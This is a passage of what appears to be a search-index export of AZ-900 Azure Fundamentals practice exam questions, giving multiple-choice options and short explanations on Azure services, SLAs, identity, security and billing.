        Explanation: The shared security model means that, depending on the application model, you and Azure both have roles in ensuring a secure environment. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/shared-responsibility

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-the-name-of-the-collective-set-of-apis-that-provide-machine-learning-and-artificial-intelligence-services-to-your-own-applications-like-voice-recognition-image-tagging-and-chat-bot","title":"Question 6:\u00a0What is the name of the collective set of APIs that provide machine learning and artificial intelligence services to your own applications like voice recognition, image tagging, and chat bot?","text":"
        • Cognitive Services
        • Natural Language Service, LUIS
        • Azure Machine Learning Studio
        • Azure Batch

        Explanation: Azure Cognitive Services is the set of Machine Learning and AI API's. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-what-happens-if-azure-does-not-meet-its-own-service-level-agreement-guarantee-sla","title":"Question 7:\u00a0What happens if Azure does not meet its own Service Level Agreement guarantee (SLA)?","text":"
        • The service will be free that month
        • You will be financially refunded a small amount of your monthly fee
        • It's not possible. Azure will always meet it's SLA?

        Explanation: Microsoft offers a refund of 10% or 25% depending on how badly they miss their service guarantee. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-software-is-used-to-synchronize-your-on-premises-ad-with-your-azure-ad","title":"Question 8:\u00a0What software is used to synchronize your on premises AD with your Azure AD?","text":"
        • Azure AD Federation Services
        • Azure AD Domain Services
        • LDAP
        • AD Connect

        Explanation: AD Connect is used to synchronize your corporate AD with Azure AD. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-azure-ad-connect

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-true-or-false-if-your-feature-is-in-the-general-availability-phase-then-your-feature-will-receive-support-from-all-microsoft-support-channels","title":"Question 9:\u00a0True or false: If your feature is in the General Availability phase, then your feature will receive support from all Microsoft support channels.","text":"
        • TRUE
        • FALSE

        Explanation: This is true. Do not use preview features in production apps. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-true-or-false-if-you-wanted-to-deploy-a-virtual-machine-to-china-you-would-just-choose-the-china-region-from-the-drop-down","title":"Question 10:\u00a0TRUE OR FALSE: If you wanted to deploy a virtual machine to China, you would just choose the China region from the drop down.","text":"
        • FALSE
        • TRUE

        Explanation: Some regions of the world require special contracts with the local provider such as Germany and China. For more info:\u00a0https://docs.microsoft.com/en-us/azure/china/overview-checklist

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-what-is-a-policy-initiative-in-azure","title":"Question 11: What is a policy initiative in Azure?","text":"
        • A custom designed policy
        • Requiring all resources in Azure to use tags
        • The ability to group policies together
        • Assigning permissions to a role in Azure

        Explanation: The ability to group policies together. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview#initiative-definition

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-which-database-product-offers-sub-5-millisecond-response-times-as-a-feature","title":"Question 12: Which database product offers \"sub 5 millisecond\" response times as a feature?","text":"
        • Cosmos DB
        • SQL Data Warehouse
        • SQL Server in a VM
        • Azure SQL Database

        Explanation: Cosmos DB is low latency, and even offers sub 5-ms response times at some levels. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/introduction

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-resources-are-not-considered-compute-resources","title":"Question 13:\u00a0Which of the following resources are not considered Compute resources?","text":"
        • Function Apps
        • Azure Batch
        • Virtual Machines
        • Virtual Machine Scale Sets
        • Load Balancer

        Explanation: A load balancer is a networking product, and does not execute your code. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview. For more information on compute resources:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-with-azure-public-cloud-anyone-with-a-valid-credit-card-can-sign-up-and-get-services-immediately","title":"Question 14:\u00a0With Azure public cloud, anyone with a valid credit card can sign up and get services immediately","text":"
        • FALSE
        • TRUE

        Explanation: Yes, Azure public cloud is open to the public in all countries that Azure supports. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/create-an-azure-account/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-azure-service-can-be-enabled-to-enable-multi-factor-authentication-for-administrators-but-not-require-it-for-regular-users","title":"Question 15:\u00a0Which Azure service can be enabled to enable Multi-Factor Authentication for administrators but not require it for regular users?","text":"
        • Azure AD B2B
        • Advanced Threat Protection
        • Azure Firewall
        • Privileged Identity Management

        Explanation: Privileged Identity Management can be used to ensure privileged users have to jump through additional verification because of their role. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-an-azure-subscription","title":"Question 16: What is an Azure Subscription?","text":"
        • Each user account is associated with a unique subscription. If you need more than one subscription, you need to create multiple user accounts.
        • It is the level at which services are billed. All resources created under a subscription are billed to that subscription.

        Explanation: Subscription is the level at which things get billed. Multiple users can be associated with a subscription at various permission levels. For more info:\u00a0https://docs.microsoft.com/en-us/services-hub/health/azure_sponsored_subscription

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-operating-systems-does-an-azure-virtual-machine-support","title":"Question 17:\u00a0What operating systems does an Azure Virtual Machine support?","text":"
        • Windows, Linux and macOS
        • macOS
        • Windows
        • Linux
        • Windows and Linux

        Explanation: Azure Virtual Machines support Windows and Linux. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-azure-management-tool-analyzes-your-usage-of-azure-and-makes-suggestions-specifically-targeted-to-help-you-optimize-your-usage-of-azure-regarding-cost-security-and-performance","title":"Question 18:\u00a0Which Azure management tool analyzes your usage of Azure and makes suggestions specifically targeted to help you optimize your usage of Azure regarding cost, security and performance?","text":"
        • Azure Service Health
        • Azure Advisor
        • Azure Firewall
        • Azure Mobile App

        Explanation: Azure Advisor analyzes your specific usage of Azure and makes helpful suggestions on how it can be improved.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-feature-within-azure-alerts-you-to-service-issues-that-happen-in-azure-itself-not-specifically-related-to-your-own-resources","title":"Question 19:\u00a0Which feature within Azure alerts you to service issues that happen in Azure itself, not specifically related to your own resources?","text":"
        • Azure Monitor
        • Azure Portal Dashboard
        • Azure Service Health
        • Azure Security Center

        Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-two-features-does-virtual-machine-scale-sets-provide-as-part-of-the-core-product-pick-two","title":"Question 20:\u00a0Which two features does Virtual Machine Scale Sets provide as part of the core product? Pick two.","text":"
        • Content Delivery Network
        • Firewall
        • Automatic installation of supporting apps and deployment of custom code
        • Load balancing between virtual machines
        • Autoscaling of virtual machines

        Explanation: VMSS provides autoscale features and has a built in load balancer. You still need to have a way to deploy your code to the new servers, as you do with regular VMs. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-can-you-go-to-see-what-standards-microsoft-is-in-compliance-with","title":"Question 21:\u00a0Where can you go to see what standards Microsoft is in compliance with?","text":"
        • Azure Service Health
        • Azure Security Center
        • Trust Center
        • Azure Privacy Page

        Explanation: The list of standards that Azure has been certified to meet is in the Trust Center. For more info:\u00a0https://www.microsoft.com/en-us/trust-center

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-does-it-mean-if-a-service-is-in-private-preview-mode","title":"Question 22: What does it mean if a service is in Private Preview mode?","text":"
        • The service is generally available for use, and Microsoft will provide support for it
        • Anyone can use the service but it must not be for production use
        • You have to apply to get selected in order to use that service
        • Anyone can use the service for any reason

        Explanation: Private Preview means you have to apply to use a service, and you may or may not be selected. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-what-are-groups-of-subscriptions-called","title":"Question 23: What are groups of subscriptions called?","text":"
        • Azure Policy
        • Subscription Groups
        • ARM Groups
        • Management Groups

        Explanation: Subscriptions can be nested and placed into management groups to make managing them easier. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-how-do-you-stop-your-azure-account-from-incurring-costs-above-a-certain-level-without-your-knowledge","title":"Question 24: How do you stop your Azure account from incurring costs above a certain level without your knowledge?","text":"
        • Switch to Azure Reserved Instances with Hybrid Benefit for VMs
        • Only use Azure Functions which have a significant free limit
        • Implement the Azure spending limit in the Account Center
        • Set up a billing alert to send you an email when it reaches a certain level

        Explanation: If you don't want to spend over a certain amount, implement a spending limit in the account center. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/spending-limit

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-how-does-multi-factor-authentication-make-a-system-more-secure","title":"Question 25:\u00a0How does Multi-Factor Authentication make a system more secure?","text":"
        • It allows the user to log in without a password because they have already previously been validated using a browser cookie
        • It requires the user to have access to their verified phone in order to log in
        • It doesn't make it more secure
        • It is another password that a user has to memorize, making it more secure

        Explanation: Multi-Factor Authentication (MFA) - the concept of having something additional to a \u201cpassword\u201d that is required to log in; passwords are find-able or guessable; but having your mobile phone on you to receive a phone call, text or run an app to get a code is harder for an unknown hacker to get. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-how-many-hours-are-available-free-when-using-the-azure-b1s-general-purpose-virtual-machines-under-a-azure-free-account-in-the-first-12-months","title":"Question 26:\u00a0How many hours are available free when using the Azure B1S General Purpose Virtual Machines under a Azure free account in the first 12 months?","text":"
        • 500 hrs
        • 750 hrs
        • 300 hrs
        • Indefinite amount of hrs

        Explanation: Each Azure free account includes 750 hours free for Azure B1S General Purpose Virtual Machines for the first 12 months. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-what-is-the-goal-of-a-ddos-attack","title":"Question 27:\u00a0What is the goal of a DDoS attack?","text":"
        • To extract data from a database
        • To trick users into giving up personal information
        • To overwhelm and exhaust application resources
        • To crack the password from administrator accounts

        Explanation: DDoS is a type of attack that tries to exhaust application resources. The goal is to affect the application\u2019s availability and its ability to handle legitimate requests. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-true-or-false-azure-powershell-scripts-and-command-line-interface-cli-scripts-are-entirely-compatible-with-each-other","title":"Question 28: True or false: Azure PowerShell scripts and Command Line Interface (CLI) scripts are entirely compatible with each other?","text":"
        • TRUE
        • FALSE

        Explanation: No, PowerShell is it's own language, different than CLI. For more info:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-for-tax-optimization-which-type-of-expense-is-preferable","title":"Question 29:\u00a0For tax optimization, which type of expense is preferable?","text":"
        • CapEx
        • OpEx

        Explanation: Operating Expenditure is thought to be preferable because you can fully deduct expenses when they are incurred. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/fiscal-outcomes

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-is-the-recommended-way-within-azure-to-store-secrets-such-as-private-cryptographic-keys","title":"Question 30:\u00a0What is the recommended way within Azure to store secrets such as private cryptographic keys?","text":"
        • Azure Advanced Threat Protection (ATP)
        • In an Azure Storage account private blob container
        • Within the application code
        • Azure Key Vault

        Explanation: Azure Key Vault - the modern way to store cryptographic keys, signed certificates and secrets in Azure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/key-vault/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-would-be-an-example-of-an-internet-of-things-iot-device","title":"Question 31:\u00a0Which of the following would be an example of an Internet of Things (IoT) device?","text":"
        • A video game, installed on Windows clients around the world, that keep user scores in the cloud.
        • A mobile application that is used to watch online video courses
        • A refrigerator that monitors how much milk you have left and sends you a text message when you are running low
        • A web application that people use to perform their banking tasks

        Explanation: An IoT device is not a standard computing device but connects to a network to report data on a regular basis. A web server, a personal computer, or a mobile app is not an IoT device. For more info:\u00a0https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-introduction

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-deploying-azure-app-services-applications-consists-of-what-two-components-pick-two","title":"Question 32:\u00a0Deploying Azure App Services applications consists of what two components? Pick two.","text":"
        • Database scripts
        • Configuration
        • Managing operating system updates
        • Packaged code

        Explanation: Azure App Services, platform as a service, consists of code and configuration. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-what-type-of-documents-does-the-microsoft-service-trust-portal-provide","title":"Question 33:\u00a0What type of documents does the Microsoft Service Trust Portal provide?","text":"
        • Documentation on the individual Azure services and solutions
        • Specific recommendations about your usage of Azure and ways you can improve
        • A list of standards that Microsoft follows, pen test results, security assessments, white papers, faqs, and other documents that can be used to show Microsoft's compliance efforts
        • A tool that helps you manage your compliance to various standards

        Explanation: A list of standards that Microsoft follows, pen test results, security assessments, white papers, faqs, and other documents that can be used to show Microsoft's compliance efforts. For more info:\u00a0https://servicetrust.microsoft.com/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-of-the-following-are-one-of-the-advantages-of-running-your-cloud-in-a-private-cloud","title":"Question 34: Which of the following are one of the advantages of running your cloud in a private cloud?","text":"
        • Assurance that your code, data and applications are running on isolated hardware, and on an isolated network.
        • You own the hardware, so you can change private cloud hosting providers easily.
        • Private cloud is significantly cheaper than the public cloud.

        Explanation: Private cloud generally means that you are running your code on isolated computing, not mixed in with other companies. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-are-private-public-hybrid-clouds/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-advantage-does-an-application-gateway-have-over-a-load-balancer","title":"Question 35:\u00a0What advantage does an Application Gateway have over a Load Balancer?","text":"
        • Application Gateway is more like an enterprise-grade product. You should not use a load balancer in production.
        • Application gateway understands the HTTP protocol and can interpret the URL and make decisions based on the URL.
        • Application Gateway can be scaled so that two, three or more instances of the gateway can support your application.

        Explanation: Application gateway can make load balancing decisions based on the URL path, while a load balancer can't. For more info:\u00a0https://docs.microsoft.com/en-us/azure/application-gateway/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-if-you-wanted-to-get-an-alert-every-time-a-new-virtual-machine-is-created-where-could-you-create-that","title":"Question 36:\u00a0If you wanted to get an alert every time a new virtual machine is created, where could you create that?","text":"
        • Azure Monitor
        • Azure Policy
        • Subscription settings
        • Azure Dashboard

        Explanation: The best place to track events at the resource level is Azure Monitor. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-how-many-minutes-per-month-downtime-is-9999-availability","title":"Question 37:\u00a0How many minutes per month downtime is 99.99% availability?","text":"
        • 4
        • 1
        • 40
        • 100

        Explanation: 99.99% is 4 minutes per month of downtime. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/summary/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-placed-into-the-same-availability-set-in-the-same-region","title":"Question 38:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been placed into the same Availability Set in the same region?","text":"
        • 100%
        • 99.90%
        • 99.99%
        • 99.95%

        Explanation: 99.95%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-core-problem-that-you-need-to-solve-in-order-to-have-a-high-availability-application","title":"Question 39:\u00a0What is the core problem that you need to solve in order to have a high-availability application?","text":"
        • You need to avoid single points of failure
        • You need to ensure your server has a lot of RAM and a lot of CPUs
        • You should have a backup copy of your application on standby, ready to be started up when the main application fails.
        • You need to ensure the capacity of your server exceeds your highest number of expected concurrent users

        Explanation: You'll want to avoid single points of failure, so that any component that fails does not cause the entire application to fail. For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/design-principles/redundancy

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-are-resource-groups","title":"Question 40:\u00a0What are resource groups?","text":"
        • A folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource
        • Automatically assigned groups of resources that all have the same type (virtual machine, app service, etc)
        • Based on the tag assigned to a resource by the deployment script, it is assigned to a group
        • Within Azure security model, users are organized into groups, and those groups are granted permissions to resources

        Explanation: Resource Groups - a folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-services-would-not-be-considered-infrastructure-as-a-service","title":"Question 41:\u00a0Which of the following services would NOT be considered Infrastructure as a Service?","text":"
        • Virtual Network Interface Card (NIC)
        • Azure Functions App
        • Virtual Machine
        • Virtual Network

        Explanation: Functions are small pieces of code that you give to Azure to run for you, and you have no access to the underlying infrastructure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-two-advantages-does-cloud-computing-elasticity-give-to-you-pick-two","title":"Question 42:\u00a0What two advantages does cloud computing elasticity give to you? Pick two.","text":"
        • You can do more regular backups and you won't lose as much when that backup gets restored
        • You can save money.
        • Servers have become a commodity and Microsoft doesn't even need to even fix servers that fail within Azure.
        • You can serve users better during peak traffic periods by automatically adding more capacity.

        Explanation: Elasticity saves you money during slow periods (over night, over the weekend, over the summer, etc) and also allows you to handle the highest peak of traffic. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-which-of-the-following-elements-is-considered-part-of-the-network-layer-of-network-security","title":"Question 43:\u00a0Which of the following elements is considered part of the \"network\" layer of network security?","text":"
        • Keeping operating systems up to date with patches
        • All of the above
        • Locks on the data center doors
        • Separate servers into distinct subnets by role

        Explanation: Subnets is part of network security. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices and https://en.wikipedia.org/wiki/OSI_model

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-what-data-format-are-arm-templates-created-in","title":"Question 44:\u00a0What data format are ARM templates created in?","text":"
        • JSON
        • YAML
        • HTML
        • XML

        Explanation: ARM templates are created in JSON. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-does-the-letter-r-in-rbac-stand-for","title":"Question 45:\u00a0What does the letter R in RBAC stand for?","text":"
        • Rights
        • Review
        • Role
        • Rule

        Explanation: RBAC is role based access control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-when-enabled-will-automatically-block-traffic-to-or-from-known-malicious-ip-addresses-and-domains","title":"Question 46:\u00a0Which Azure service, when enabled, will automatically block traffic to or from known malicious IP addresses and domains?","text":"
        • Network Security Groups
        • Azure Active Directory
        • Azure Firewall
        • Load Balancer

        Explanation: Azure Firewall has a threat-intelligence option that will automatically block traffic to/from bad actors on the Internet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/firewall/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-true-or-false-azure-tenant-is-a-dedicated-and-trusted-instance-of-azure-active-directory-thats-automatically-created-when-your-organization-signs-up-for-a-microsoft-cloud-service-subscription","title":"Question 47:\u00a0TRUE OR FALSE: Azure Tenant is a dedicated and trusted instance of Azure Active Directory that's automatically created when your organization signs up for a Microsoft cloud service subscription.","text":"
        • TRUE
        • FALSE

        Explanation: Yes, Azure Tenant is a dedicated and trusted instance of Azure AD that's automatically created when your organization signs up for a Microsoft cloud service subscription. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-why-should-you-divide-your-application-into-multiple-subnets-as-opposed-to-having-all-your-web-application-and-database-servers-running-on-the-same-subnet","title":"Question 48:\u00a0Why should you divide your application into multiple subnets as opposed to having all your web, application and database servers running on the same subnet?","text":"
        • Each server type of your application requires its own subnet. It's not possible to mix web servers, database servers and application servers on the same subnet.
        • Separating your application into multiple subnets allows you to have different NSG security rules for each subnet, which can make it harder for a hacker to get from one compromised server onto another.
        • There are only a limited number of IP addresses available per subnet, so you need multiple subnets over a certain number.

        Explanation: For security purposes, you should not allow \"port 80\" web traffic to reach certain servers, and you do that by having separate NSG rules on each subnet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-style-of-computing-is-easiest-when-migrating-an-existing-hosted-application-from-your-own-data-center-into-the-cloud","title":"Question 49:\u00a0Which style of computing is easiest when migrating an existing hosted application from your own data center into the cloud?","text":"
        • PaaS
        • IaaS
        • FaaS
        • Serverless

        Explanation: Infrastructure as a service is the easiest to migrate into, from an existing hosted app - lift and shift. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-if-you-have-an-azure-free-account-with-a-200-credit-for-the-first-month-what-happens-when-you-reach-the-200-limit","title":"Question 50:\u00a0If you have an Azure free account, with a $200 credit for the first month, what happens when you reach the $200 limit?","text":"
        • Your account is automatically closed.
        • Your credit card is automatically billed.
        • All services are stopped and you must decide whether you want to convert to a paid account or not.
        • You cannot create any more resources until you add more credits to the account.

        Explanation: Using up the free credits causes all your resources to be stopped until you decide to get a paid account. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-4","title":"Test 4","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-all-resources-in-a-vnet-can-communicate-outbound-to-the-internet-by-default","title":"Question 1:\u00a0All resources in a VNet can communicate outbound to the internet, by default.","text":"
        • No
        • Yes

        Azure Virtual Network (VNet)\u00a0is the fundamental building block for your private network in Azure. VNet enables many types of Azure resources, such as Azure Virtual Machines (VM), to securely communicate with each other, the internet, and on-premises networks. VNet is similar to a traditional network that you'd operate in your own data center, but brings with it additional benefits of Azure's infrastructure such as scale, availability, and isolation. All resources in a VNet can communicate outbound to the internet, by default. You can communicate inbound to a resource by assigning a public IP address or a public Load Balancer. You can also use public IP or public Load Balancer to manage your outbound connections. To learn more about outbound connections in Azure, see\u00a0Outbound connections,\u00a0Public IP addresses, and\u00a0Load Balancer

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-is-it-possible-for-you-to-run-both-bash-and-powershell-based-scripts-from-the-azure-cloud-shell","title":"Question 2:\u00a0Is it possible for you to run BOTH\u00a0Bash and Powershell based scripts from the Azure Cloud shell?","text":"
        • Yes
        • No

        Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources. It provides the flexibility of choosing the shell experience that best suits the way you work,\u00a0either Bash or PowerShell.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-as-the-cloud-admin-of-your-organization-you-want-to-block-your-employees-from-accessing-your-apps-from-specific-locations-which-of-the-following-can-help-you-achieve-this","title":"Question 3:\u00a0As the Cloud Admin of your organization, you want to Block your employees from accessing your apps from specific locations. Which of the following can help you achieve this?","text":"
        • Azure Active Directory Conditional Access
        • Azure Sentinel - Azure Single Sign On (SSO)
        • Azure Role Based Access Control (RBAC)

        The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together, to make decisions, and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane. Conditional Access policies at their simplest are if-then statements, if a user wants to access a resource, then they must complete an action. Example: A payroll manager wants to access the payroll application and is required to do multi-factor authentication to access it.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-is-the-primary-purpose-of-external-identities-in-azure-active-directory","title":"Question 4:\u00a0What is the primary purpose of external identities in Azure Active Directory?","text":"
        • To enable single sign-on between Azure subscriptions.
        • To manage user identities exclusively for on-premises applications.
        • To allow external partners and customers to access resources in your Azure environment
        • To provide secure access to Azure resources for employees within the organization.

        External identities in Azure AD enable organizations to extend their identity management beyond their own employees. This allows external partners, vendors, and customers to access specific resources within the organization's Azure environment without requiring them to have internal accounts. Reference:\u00a0https://learn.microsoft.com/en-us/azure/active-directory/external-identities/external-identities-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-your-startup-plans-to-migrate-to-azure-soon-but-for-all-the-resources-you-would-like-control-of-the-underlying-operating-system-and-middleware-which-of-the-following-cloud-models-would-make-the-most-sense","title":"Question 5:\u00a0Your startup plans to migrate to Azure soon, but for all the resources, you would like control of the underlying Operating System and Middleware. Which of the following cloud models would make the most sense?","text":"
        • Infrastructure as a Service (laaS)
        • Anything as a Service (XaaS)
        • Platform as a Service (PaaS)
        • Software as a Service (SaaS)

        Infrastructure as a service (IaaS)\u00a0is a type of cloud computing service that offers essential compute, storage, and networking resources on demand, on a pay-as-you-go basis. IaaS is one of the four types of cloud services, along with software as a service (SaaS), platform as a service (PaaS), and\u00a0serverless. Migrating your organization's infrastructure to an IaaS solution helps you reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. IaaS solutions give you the flexibility to scale your IT resources up and down with demand. They also help you quickly provision new applications and increase the reliability of your underlying infrastructure. IaaS lets you bypass the cost and complexity of buying and managing physical servers and datacenter infrastructure. Each resource is offered as a separate service component, and you only pay for a particular resource for as long as you need it. A\u00a0cloud computing service provider\u00a0like\u00a0Azure\u00a0manages the infrastructure, while you purchase, install, configure, and manage your own software\u2014including operating systems, middleware, and applications.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-your-company-has-decided-to-migrate-its-on-premises-virtual-machines-to-azure-which-azure-virtual-machines-feature-allows-you-to-migrate-virtual-machines-without-downtime","title":"Question 6:\u00a0Your company has decided to migrate its on-premises virtual machines to Azure. Which Azure Virtual Machines feature allows you to migrate virtual machines without downtime?","text":"
        • Azure Virtual Machine Scale Sets
        • Azure Site Recovery
        • Azure Spot Virtual Machines
        • Azure Reserved Virtual Machines

        The correct answer is Azure Site Recovery. Azure Site Recovery (ASR)\u00a0is a service offered by Azure that enables replication of virtual machines from on-premises environments to Azure or between Azure regions with little or no downtime. This allows for the migration of virtual machines to Azure without any disruption to business operations. After replication to Azure, the virtual machines can be launched and used as if they were in the on-premises environment.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-youve-been-planning-to-decommission-your-on-prem-database-hosting-gigabytes-of-data-which-of-the-following-is-true-about-data-ingress-moving-into-for-azure","title":"Question 7:\u00a0You've been planning to decommission your On-Prem database hosting Gigabytes of data. Which of the following is True about data ingress (moving into) for Azure?","text":"
        • It is free of cost
